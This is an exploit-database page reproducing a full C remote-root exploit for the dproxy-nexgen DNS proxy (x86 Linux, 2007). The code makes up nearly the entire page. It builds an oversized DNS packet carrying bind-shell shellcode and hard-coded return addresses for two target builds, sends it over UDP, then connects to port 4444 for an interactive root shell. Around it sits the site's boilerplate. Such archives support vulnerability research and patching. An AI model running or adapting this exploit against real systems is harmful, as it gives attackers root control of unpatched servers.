Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

dproxy-nexgen Remote Root Buffer Overflow Exploit (x86-lnx)

🗓️ 03 Apr 2007 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 16 Views

dproxy-nexgen remote root buffer overflow exploit for x86-lnx. Free software under GNU license, tested on dproxy-nexgen (.tar.gz). Contains buffer overflow code for remote shell access

Code

                                                /* dproxy-v1.c
 *
&nbsp;*&nbsp;Copyright&nbsp;(c)&nbsp;2007&nbsp;by&nbsp;<[email protected]>
&nbsp;*
&nbsp;*&nbsp;dproxy-nexgen&nbsp;remote&nbsp;root&nbsp;exploit&nbsp;(x86-lnx)
&nbsp;*&nbsp;by&nbsp;mu-b&nbsp;-&nbsp;Mar&nbsp;2007
&nbsp;*
&nbsp;*&nbsp;-&nbsp;Tested&nbsp;on:&nbsp;dproxy-nexgen&nbsp;(.tar.gz)
&nbsp;*
&nbsp;*&nbsp;This&nbsp;program&nbsp;is&nbsp;free&nbsp;software;&nbsp;you&nbsp;can&nbsp;redistribute&nbsp;it&nbsp;and/or&nbsp;modify
&nbsp;*&nbsp;it&nbsp;under&nbsp;the&nbsp;terms&nbsp;of&nbsp;the&nbsp;GNU&nbsp;General&nbsp;Public&nbsp;License&nbsp;as&nbsp;published&nbsp;by
&nbsp;*&nbsp;the&nbsp;Free&nbsp;Software&nbsp;Foundation;&nbsp;version&nbsp;2&nbsp;of&nbsp;the&nbsp;License.
&nbsp;*
&nbsp;*&nbsp;This&nbsp;program&nbsp;is&nbsp;distributed&nbsp;in&nbsp;the&nbsp;hope&nbsp;that&nbsp;it&nbsp;will&nbsp;be&nbsp;useful,
&nbsp;*&nbsp;but&nbsp;WITHOUT&nbsp;ANY&nbsp;WARRANTY;&nbsp;without&nbsp;even&nbsp;the&nbsp;implied&nbsp;warranty&nbsp;of
&nbsp;*&nbsp;MERCHANTABILITY&nbsp;or&nbsp;FITNESS&nbsp;FOR&nbsp;A&nbsp;PARTICULAR&nbsp;PURPOSE.&nbsp;&nbsp;See&nbsp;the
&nbsp;*&nbsp;GNU&nbsp;General&nbsp;Public&nbsp;License&nbsp;for&nbsp;more&nbsp;details.
&nbsp;*
&nbsp;*&nbsp;http://www.digit-labs.org/&nbsp;--&nbsp;Digit-Labs&nbsp;2007!@$!
&nbsp;*/

#include&nbsp;<stdio.h>
#include&nbsp;<stdlib.h>
#include&nbsp;<string.h>
#include&nbsp;<unistd.h>
#include&nbsp;<netinet/in.h>
#include&nbsp;<netdb.h>

#define&nbsp;BUF_SIZE&nbsp;&nbsp;&nbsp;&nbsp;512
#define&nbsp;NOP&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0x41

#define&nbsp;DEF_PORT&nbsp;&nbsp;&nbsp;&nbsp;53
#define&nbsp;PORT_DNS&nbsp;&nbsp;&nbsp;&nbsp;DEF_PORT
#define&nbsp;PORT_SHELL&nbsp;&nbsp;4444

const&nbsp;u_char&nbsp;bndshell_lnx[]&nbsp;=
&nbsp;&nbsp;\"x31xdbx53x43x53x6ax02x6ax66x58x99x89xe1xcdx80x96\"
&nbsp;&nbsp;\"x43x52x66x68x11x5cx66x53x89xe1x6ax66x58x50x51x56\"
&nbsp;&nbsp;\"x89xe1xcdx80xb0x66xd1xe3xcdx80x52x52x56x43x89xe1\"
&nbsp;&nbsp;\"xb0x66xcdx80x93x6ax02x59xb0x3fxcdx80x49x79xf9xb0\"
&nbsp;&nbsp;\"x0bx52x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x52x53\"
&nbsp;&nbsp;\"x89xe1xcdx80\";

#define&nbsp;NUM_TARGETS&nbsp;2

struct&nbsp;target_t
{
&nbsp;&nbsp;const&nbsp;u_char&nbsp;*name;
&nbsp;&nbsp;const&nbsp;int&nbsp;len;
&nbsp;&nbsp;const&nbsp;int&nbsp;zshell_pos;
&nbsp;&nbsp;const&nbsp;u_char&nbsp;*zshell;
&nbsp;&nbsp;const&nbsp;int&nbsp;fp_pos;
&nbsp;&nbsp;const&nbsp;u_long&nbsp;fp;
};

/*&nbsp;fp&nbsp;=&nbsp;objdump&nbsp;-D&nbsp;dproxy&nbsp;|&nbsp;grep&nbsp;\"ff&nbsp;e2\"&nbsp;*/
struct&nbsp;target_t&nbsp;targets[]&nbsp;=&nbsp;{
&nbsp;&nbsp;{\"dproxy-nexgen&nbsp;(tar.gz)\",
&nbsp;&nbsp;&nbsp;512,&nbsp;25,&nbsp;bndshell_lnx,&nbsp;284,&nbsp;0x08048cf9}
&nbsp;&nbsp;,
&nbsp;&nbsp;{\"dproxy-nexgen&nbsp;(tar.gz,&nbsp;Debian&nbsp;stable)\",
&nbsp;&nbsp;&nbsp;512,&nbsp;25,&nbsp;bndshell_lnx,&nbsp;281,&nbsp;0x08048cf8}
&nbsp;&nbsp;,
&nbsp;&nbsp;{0}
};

static&nbsp;int&nbsp;sock_send&nbsp;(int&nbsp;sock,&nbsp;u_char&nbsp;*&nbsp;src,&nbsp;int&nbsp;len);
static&nbsp;int&nbsp;sock_recv&nbsp;(int&nbsp;sock,&nbsp;u_char&nbsp;*&nbsp;dst,&nbsp;int&nbsp;len);
static&nbsp;void&nbsp;sock_send_udp&nbsp;(u_char&nbsp;*&nbsp;host,&nbsp;int&nbsp;port,&nbsp;u_char&nbsp;*&nbsp;src,&nbsp;int&nbsp;len);
static&nbsp;int&nbsp;sockami&nbsp;(u_char&nbsp;*&nbsp;host,&nbsp;int&nbsp;port);
static&nbsp;void&nbsp;shellami&nbsp;(int&nbsp;sock);
static&nbsp;void&nbsp;zbuffami&nbsp;(u_char&nbsp;*&nbsp;zbuf,&nbsp;struct&nbsp;target_t&nbsp;*trgt);

static&nbsp;int
sock_send&nbsp;(int&nbsp;sock,&nbsp;u_char&nbsp;*&nbsp;src,&nbsp;int&nbsp;len)
{
&nbsp;&nbsp;int&nbsp;sbytes;

&nbsp;&nbsp;sbytes&nbsp;=&nbsp;send&nbsp;(sock,&nbsp;src,&nbsp;len,&nbsp;0);

&nbsp;&nbsp;return&nbsp;(sbytes);
}

static&nbsp;int
sock_recv&nbsp;(int&nbsp;sock,&nbsp;u_char&nbsp;*&nbsp;dst,&nbsp;int&nbsp;len)
{
&nbsp;&nbsp;int&nbsp;rbytes;

&nbsp;&nbsp;rbytes&nbsp;=&nbsp;recv&nbsp;(sock,&nbsp;dst,&nbsp;len,&nbsp;0);
&nbsp;&nbsp;if&nbsp;(rbytes&nbsp;>=&nbsp;0)
&nbsp;&nbsp;&nbsp;&nbsp;dst[rbytes]&nbsp;=&nbsp;\'\';

&nbsp;&nbsp;return&nbsp;(rbytes);
}

static&nbsp;void
sock_send_udp&nbsp;(u_char&nbsp;*&nbsp;host,&nbsp;int&nbsp;port,&nbsp;u_char&nbsp;*&nbsp;src,&nbsp;int&nbsp;len)
{
&nbsp;&nbsp;struct&nbsp;sockaddr_in&nbsp;address;
&nbsp;&nbsp;struct&nbsp;hostent&nbsp;*hp;
&nbsp;&nbsp;int&nbsp;sock;

&nbsp;&nbsp;fflush&nbsp;(stdout);
&nbsp;&nbsp;if&nbsp;((sock&nbsp;=&nbsp;socket&nbsp;(AF_INET,&nbsp;SOCK_DGRAM,&nbsp;0))&nbsp;==&nbsp;-1)
&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;perror&nbsp;(\"socket()\");
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;exit&nbsp;(-1);
&nbsp;&nbsp;&nbsp;&nbsp;}

&nbsp;&nbsp;if&nbsp;((hp&nbsp;=&nbsp;gethostbyname&nbsp;(host))&nbsp;==&nbsp;NULL)
&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;perror&nbsp;(\"gethostbyname()\");
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;exit&nbsp;(-1);
&nbsp;&nbsp;&nbsp;&nbsp;}

&nbsp;&nbsp;memset&nbsp;(&address,&nbsp;0,&nbsp;sizeof&nbsp;(address));
&nbsp;&nbsp;memcpy&nbsp;((char&nbsp;*)&nbsp;&address.sin_addr,&nbsp;hp->h_addr,&nbsp;hp->h_length);
&nbsp;&nbsp;address.sin_family&nbsp;=&nbsp;AF_INET;
&nbsp;&nbsp;address.sin_port&nbsp;=&nbsp;htons&nbsp;(port);

&nbsp;&nbsp;sendto&nbsp;(sock,&nbsp;src,&nbsp;len,&nbsp;0,&nbsp;(struct&nbsp;sockaddr&nbsp;*)&nbsp;&address,&nbsp;sizeof&nbsp;(address));
}

static&nbsp;int
sockami&nbsp;(u_char&nbsp;*&nbsp;host,&nbsp;int&nbsp;port)
{
&nbsp;&nbsp;struct&nbsp;sockaddr_in&nbsp;address;
&nbsp;&nbsp;struct&nbsp;hostent&nbsp;*hp;
&nbsp;&nbsp;int&nbsp;sock;

&nbsp;&nbsp;fflush&nbsp;(stdout);
&nbsp;&nbsp;if&nbsp;((sock&nbsp;=&nbsp;socket&nbsp;(AF_INET,&nbsp;SOCK_STREAM,&nbsp;0))&nbsp;==&nbsp;-1)
&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;perror&nbsp;(\"socket()\");
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;exit&nbsp;(-1);
&nbsp;&nbsp;&nbsp;&nbsp;}

&nbsp;&nbsp;if&nbsp;((hp&nbsp;=&nbsp;gethostbyname&nbsp;(host))&nbsp;==&nbsp;NULL)
&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;perror&nbsp;(\"gethostbyname()\");
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;exit&nbsp;(-1);
&nbsp;&nbsp;&nbsp;&nbsp;}

&nbsp;&nbsp;memset&nbsp;(&address,&nbsp;0,&nbsp;sizeof&nbsp;(address));
&nbsp;&nbsp;memcpy&nbsp;((char&nbsp;*)&nbsp;&address.sin_addr,&nbsp;hp->h_addr,&nbsp;hp->h_length);
&nbsp;&nbsp;address.sin_family&nbsp;=&nbsp;AF_INET;
&nbsp;&nbsp;address.sin_port&nbsp;=&nbsp;htons&nbsp;(port);

&nbsp;&nbsp;if&nbsp;(connect&nbsp;(sock,&nbsp;(struct&nbsp;sockaddr&nbsp;*)&nbsp;&address,&nbsp;sizeof&nbsp;(address))&nbsp;==&nbsp;-1)
&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;perror&nbsp;(\"connect()\");
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;exit&nbsp;(EXIT_FAILURE);
&nbsp;&nbsp;&nbsp;&nbsp;}

&nbsp;&nbsp;return&nbsp;(sock);
}

static&nbsp;void
shellami&nbsp;(int&nbsp;sock)
{
&nbsp;&nbsp;int&nbsp;n;
&nbsp;&nbsp;fd_set&nbsp;rset;
&nbsp;&nbsp;u_char&nbsp;recvbuf[1024],&nbsp;*cmd&nbsp;=&nbsp;\"id;&nbsp;uname&nbsp;-a;&nbsp;uptime
\";

&nbsp;&nbsp;sock_send&nbsp;(sock,&nbsp;cmd,&nbsp;strlen&nbsp;(cmd));

&nbsp;&nbsp;while&nbsp;(1)
&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;FD_ZERO&nbsp;(&rset);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;FD_SET&nbsp;(sock,&nbsp;&rset);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;FD_SET&nbsp;(STDIN_FILENO,&nbsp;&rset);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;select&nbsp;(sock&nbsp;+&nbsp;1,&nbsp;&rset,&nbsp;NULL,&nbsp;NULL,&nbsp;NULL);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(FD_ISSET&nbsp;(sock,&nbsp;&rset))
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;((n&nbsp;=&nbsp;sock_recv&nbsp;(sock,&nbsp;recvbuf,&nbsp;sizeof&nbsp;(recvbuf)&nbsp;-&nbsp;1))&nbsp;<=&nbsp;0)
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;fprintf&nbsp;(stderr,&nbsp;\"Connection&nbsp;closed&nbsp;by&nbsp;foreign&nbsp;host.
\");
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;exit&nbsp;(EXIT_SUCCESS);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;printf&nbsp;(\"%s\",&nbsp;recvbuf);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(FD_ISSET&nbsp;(STDIN_FILENO,&nbsp;&rset))
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;((n&nbsp;=&nbsp;read&nbsp;(STDIN_FILENO,&nbsp;recvbuf,&nbsp;sizeof&nbsp;(recvbuf)&nbsp;-&nbsp;1))&nbsp;>&nbsp;0)
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;recvbuf[n]&nbsp;=&nbsp;\'\';
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;sock_send&nbsp;(sock,&nbsp;recvbuf,&nbsp;n);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;}
}

static&nbsp;void
zbuffami&nbsp;(u_char&nbsp;*&nbsp;zbuf,&nbsp;struct&nbsp;target_t&nbsp;*trgt)
{
&nbsp;&nbsp;int&nbsp;i;
&nbsp;&nbsp;u_char&nbsp;*ptr;
&nbsp;&nbsp;
&nbsp;&nbsp;ptr&nbsp;=&nbsp;zbuf;
&nbsp;&nbsp;memset&nbsp;(ptr,&nbsp;NOP,&nbsp;trgt->len);

&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0x69;&nbsp;/*&nbsp;transaction&nbsp;id&nbsp;*/
&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0x69;
&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0x81;&nbsp;/*&nbsp;flags&nbsp;*/
&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0x80;
&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0x00;&nbsp;/*&nbsp;number&nbsp;of&nbsp;questions&nbsp;*/
&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0x00;
&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0x00;&nbsp;/*&nbsp;number&nbsp;of&nbsp;answers&nbsp;*/
&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0x01;
&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0x00;&nbsp;/*&nbsp;number&nbsp;of&nbsp;authority&nbsp;rr\'s&nbsp;*/
&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0x00;
&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0x00;&nbsp;/*&nbsp;number&nbsp;of&nbsp;additional&nbsp;rr\'s&nbsp;*/
&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0x00;

&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0xc0;&nbsp;/*&nbsp;compressed&nbsp;name&nbsp;&ptr+18&nbsp;*/
&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0x18;
&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0x00;&nbsp;/*&nbsp;type&nbsp;=&nbsp;PTR&nbsp;*/
&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0x0c;
&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0x07;&nbsp;/*&nbsp;class&nbsp;=&nbsp;jmp&nbsp;short&nbsp;+0x07&nbsp;*/
&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0xeb;

&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0xff;&nbsp;/*&nbsp;ttl&nbsp;*/
&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0xff;
&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0xff;
&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0xff;

&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0x01;&nbsp;/*&nbsp;data&nbsp;length&nbsp;=&nbsp;488&nbsp;bytes&nbsp;*/
&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0xe8;

&nbsp;&nbsp;/*&nbsp;wire&nbsp;format&nbsp;name&nbsp;*/
&nbsp;&nbsp;for&nbsp;(i&nbsp;=&nbsp;0;&nbsp;i&nbsp;<&nbsp;2;&nbsp;i++,&nbsp;ptr&nbsp;+=&nbsp;0x7f)&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0x7f;
&nbsp;&nbsp;&nbsp;&nbsp;memset&nbsp;(ptr,&nbsp;NOP,&nbsp;0x7f);
&nbsp;&nbsp;}

&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0x02;&nbsp;/*&nbsp;padding&nbsp;*/
&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;NOP;
&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;NOP;
&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0x00;&nbsp;/*&nbsp;terminate&nbsp;name&nbsp;*/
&nbsp;&nbsp;
&nbsp;&nbsp;/*&nbsp;terminate&nbsp;buffer&nbsp;*/
&nbsp;&nbsp;ptr&nbsp;=&nbsp;zbuf&nbsp;+&nbsp;trgt->len&nbsp;-&nbsp;1;
&nbsp;&nbsp;*ptr--&nbsp;=&nbsp;0x2e;
&nbsp;&nbsp;*ptr&nbsp;&nbsp;&nbsp;=&nbsp;0x2e;

&nbsp;&nbsp;memcpy&nbsp;(zbuf&nbsp;+&nbsp;trgt->zshell_pos,&nbsp;trgt->zshell,&nbsp;strlen&nbsp;(trgt->zshell));

&nbsp;&nbsp;zbuf[trgt->fp_pos]&nbsp;=&nbsp;(u_char)&nbsp;(trgt->fp&nbsp;&&nbsp;0x000000ff);
&nbsp;&nbsp;zbuf[trgt->fp_pos&nbsp;+&nbsp;1]&nbsp;=&nbsp;(u_char)&nbsp;((trgt->fp&nbsp;&&nbsp;0x0000ff00)&nbsp;>>&nbsp;8);
&nbsp;&nbsp;zbuf[trgt->fp_pos&nbsp;+&nbsp;2]&nbsp;=&nbsp;(u_char)&nbsp;((trgt->fp&nbsp;&&nbsp;0x00ff0000)&nbsp;>>&nbsp;16);
&nbsp;&nbsp;zbuf[trgt->fp_pos&nbsp;+&nbsp;3]&nbsp;=&nbsp;(u_char)&nbsp;((trgt->fp&nbsp;&&nbsp;0xff000000)&nbsp;>>&nbsp;24);
}

int
main&nbsp;(int&nbsp;argc,&nbsp;char&nbsp;**argv)
{
&nbsp;&nbsp;int&nbsp;sock;
&nbsp;&nbsp;u_char&nbsp;zbuf[BUF_SIZE];
&nbsp;&nbsp;struct&nbsp;target_t&nbsp;*trgt;

&nbsp;&nbsp;printf&nbsp;(\"dproxy-nexgen&nbsp;remote&nbsp;root&nbsp;exploit
\"
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\"by:&nbsp;<[email protected]>
\"
	&nbsp;&nbsp;\"http://www.digit-labs.org/&nbsp;--&nbsp;Digit-Labs&nbsp;2007!@$!

\");

&nbsp;&nbsp;if&nbsp;(argc&nbsp;<=&nbsp;2)
&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;fprintf&nbsp;(stderr,&nbsp;\"Usage:&nbsp;%s&nbsp;<host>&nbsp;<target>
\",&nbsp;argv[0]);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;exit&nbsp;(EXIT_SUCCESS);
&nbsp;&nbsp;&nbsp;&nbsp;}

&nbsp;&nbsp;if&nbsp;(atoi&nbsp;(argv[2])&nbsp;>=&nbsp;NUM_TARGETS)
&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;fprintf&nbsp;(stderr,&nbsp;\"Only&nbsp;%d&nbsp;targets&nbsp;known!!
\",&nbsp;NUM_TARGETS);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;exit&nbsp;(EXIT_SUCCESS);
&nbsp;&nbsp;&nbsp;&nbsp;}

&nbsp;&nbsp;trgt&nbsp;=&nbsp;&targets[atoi&nbsp;(argv[2])];
&nbsp;&nbsp;printf&nbsp;(\"+Attacking&nbsp;to&nbsp;%s...
\",&nbsp;argv[1]);

&nbsp;&nbsp;printf&nbsp;(\"fp:&nbsp;0x%x
\",&nbsp;(int)&nbsp;trgt->fp);
&nbsp;&nbsp;printf&nbsp;(\"buf&nbsp;len:&nbsp;%d
\",&nbsp;trgt->len);

&nbsp;&nbsp;printf&nbsp;(\"+Building&nbsp;buffer&nbsp;with&nbsp;shellcode...\");
&nbsp;&nbsp;memset&nbsp;(zbuf,&nbsp;0x00,&nbsp;sizeof&nbsp;(zbuf));
&nbsp;&nbsp;zbuffami&nbsp;(zbuf,&nbsp;trgt);
&nbsp;&nbsp;printf&nbsp;(\"&nbsp;&nbsp;done
\");

&nbsp;&nbsp;printf&nbsp;(\"+Sending&nbsp;Payload...\");
&nbsp;&nbsp;sock_send_udp&nbsp;(argv[1],&nbsp;PORT_DNS,&nbsp;zbuf,&nbsp;BUF_SIZE);
&nbsp;&nbsp;printf&nbsp;(\"&nbsp;&nbsp;done
\");

&nbsp;&nbsp;printf&nbsp;(\"+Waiting&nbsp;for&nbsp;the&nbsp;shellcode&nbsp;to&nbsp;be&nbsp;executed...
\");
&nbsp;&nbsp;sleep&nbsp;(1);
&nbsp;&nbsp;sock&nbsp;=&nbsp;sockami&nbsp;(argv[1],&nbsp;PORT_SHELL);
&nbsp;&nbsp;printf&nbsp;(\"+Wh00t!

\");
&nbsp;&nbsp;shellami&nbsp;(sock);

&nbsp;&nbsp;return&nbsp;(EXIT_SUCCESS);
}

&nbsp;

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
03 Apr 2007 00:00Current
7.1High risk
Vulners AI Score7.1
exploitbuffer overflowremote shell accessgnu licensex86-lnxdproxy-nexgen
16